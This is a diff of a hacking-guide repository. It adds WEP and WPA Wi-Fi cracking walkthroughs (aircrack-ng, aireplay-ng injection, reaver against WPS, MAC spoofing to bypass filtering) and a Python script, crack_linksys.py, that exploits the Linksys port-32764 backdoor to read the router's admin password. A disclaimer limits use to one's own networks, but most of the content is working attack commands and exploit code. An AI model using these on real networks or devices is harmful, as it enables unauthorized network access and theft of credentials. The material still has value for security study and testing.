802.11 README

Network_and_802.11/802.11/README.md

@@ -1,103 +1,113 @@
-            ***********************************************
-
-                        BT3GL's Hacking Guide
-
-            ***********************************************
+# BT3GL's Hacking Guide
 
 Disclaimer: I do not support or endorse any illegal activities! Only test these techniques in your OWN machines and networks.
 
 
-THEORY:
-=======
+## THEORY
 
-WEP
----
+### WEP
 
 WEP, or wired equivalent privacy, was the first wireless security scheme employed. As it name implies, it was designed to provide security to the end-user that was essentially equivalent to the privacy that was enjoyed in a wired environment. Unfortunately, it failed miserably.
 
 For a number of reasons, WEP is extraordinarily easy to crack because of a flawed implementation of the RC4 encryption algorithm. It's not unusual to be able to crack WEP in less than 5 minutes. This is because WEP used a very small (24-bit) initialization vector (IV) that could be captured in the datastream, and this IV could then be used to discover the password using statistical techniques.
 
 
-WPA
----
+### WPA
 
 WPA was the response by the industry to the revealed weaknesses of WEP. It's often referred to as WPA1 to distinguish it from WPA2.
 
 WPA used Temporal Key Integrity Protocol (TKIP) to improve the security of WEP without requiring new hardware. It still uses WEP for encryption, but it makes the statistical attacks used to crack WEP much more difficult and time-consuming.
 
 
-WPA2-PSK
---------
+### WPA2-PSK
 
 WPA2-PSK is the implementation of WPA2 for the home or small business user. As the name implies, it's the WPA2 implementation that uses a pre-shared key (PSK). It's this security standard that is used by most households today, and although it's far more secure, it's still vulnerable to various attacks.
 
 A feature that was added in 2007 called Wi-Fi Protected Setup, or WPS, allows us to bypass the security in WP2-PSK .
 
-WPA2-AES
+### WPA2-AES
 WPA2-AES is the enterprise implementation of WPA2. It uses the Advanced Encryption Standard or AES to encrypt data and is the most secure. It's often coupled with a RADIUS server that is dedicated for authentication.
 
 
 
 
-CRACKING WIFI PASSWORDS:
-========================
+## CRACKING WIFI PASSWORDS:
 
 
-Cracking WEP
-------------
+### Cracking WEP
+
 (Success depend on the proximity to the AP point)
 
 1) Change your MAC address:
 
+```
 $ airmon-ng ---> take note of the name of your network interfaces (example wlan0)
 $ airmon-ng stop INTERFACENAME
 $ ifconfig INTERFACENMAE down
 $ macchanger --mac 00:11:22:33:44:55
+```
 
 2) Pick your network (BSSID):
 
+```
 $ airodump-ng INTERFACENAME
+```
 
 3) See what's happening on that network and capture information to a file:
 
+```
 $ airodump-ng -c CHANNEL -W FILENAME --bssid BSSID INTERFACENAME
+```
 
 4) Open a new console and type (where the ESSID is the access point's SSID name):
 
+```
 $ aireplay-ng -1 0 -a BSSID -h 00:11:22:33:44:55 -e ESSID INTERFACE
-
 $ aireplay-ng -3 -b BSSID -h 00:11:22:33:44:55 INTERFACE
+```
 
 5) Once you have collected enough data, launch a third console to crack the data:
 
+```
 $ aircrack-ng -b BSSID FILENAME-01.cap
+```
 
 
+### Cracking WPA
 
-Cracking WPA
-------------
-
-It can take up to 2-6 hours. It can cause DoS attack.
-If the router has MAC filtering, use a network monitoring tool to find a MAC address of a system that has a connection to the router, and then set that to the address of the attack platform.
+* It can take up to 2-6 hours.
+* It can cause DoS attack.
+* If the router has MAC filtering, use a network monitoring tool to find a MAC address of a system that has a connection to the router, and then set that to the address of the attack platform.
 
 1) Find your wireless card:
 
+```
 $ iwconfig
+```
 
 2) Put your wireless card into monitor mode:
 
+```
 $ airmon-ng start wlan0
+```
+
 or
+
+```
 $ ifconfig wlan0 down
 $ iwconfig wlan0 mode monitor
 $ ifconfig wlan0 up
+```
 
 3) Find the BSSID of the router to crack:
 
+```
 $ airodump-ng wlan0 --> mon0 if this does not work
+```
 
 4) Crack a Network's WPA password with Reaver:
 
+```
 $ reaver -i mon0 -b BSSID -vv
-
+```
 

Network_and_802.11/README.md

@@ -1,34 +1,41 @@
 # Network and 802.11
 
-## 802.11
+## Subfolders:
+
+### 802.11
 
 - Cracking linksys
 - Cracking wifi: WEP, WPA, WPA2-PSK
 
----
 
-## Wireshark stuff
+### Wireshark stuff
 
 - Shark the ripper
 - Useful commands
 
----
-## Port Knocking
+### Port Knocking
 
 - Several scripts
 
----
-## Netcat, Telnet, Sockets
+### socket
+
+- Example scripts with Python's **socket** module
+
+### scapy
+
+- Example scripts with Python's **scapy** module
+
 
-- Example scripts
 
 ---
 
-## Tools
+## Useful Tools in General
 
-- Wireshark, tshark
+- [Wireshark](http://bt3gl.github.io/wiresharking-for-fun-or-profit.html)
+- tshark
 - OpenVPN
 - OpenSSL
 - nmap
 - tcpdump
-- netcat, telnet
+- netcat
+- telnet

Network_and_802.11/socket/crack_linksys.py

@@ -0,0 +1,29 @@
+import socket
+import struct
+import sys
+
+#HOST = '192.168.1.1'
+HOST = '192.168.33.1'
+PORT = 32764
+
+def send_message(s, message, payload=''):
+    header = struct.pack('<III', 0x53634D4D, message, len(payload))
+    s.send(header+payload)
+    response = s.recv(0xC)
+    if len(response) != 12:
+        print("Device is not a crackable Linksys router.")
+        print("Recieved invalid response: %s" % response)
+        raise sys.exit(1)
+    sig, ret_val, ret_len = struct.unpack('<III', response)
+    assert(sig == 0x53634D4D)
+    if ret_val != 0:
+        return ret_val, "ERROR"
+    ret_str = ""
+    while len(ret_str) < ret_len:
+        ret_str += s.recv(ret_len-len(ret_str))
+    return ret_val, ret_str
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect((HOST, PORT))
+send_message(s, 3, "wlan_mgr_enable=1")
+print send_message(s, 2, "http_password")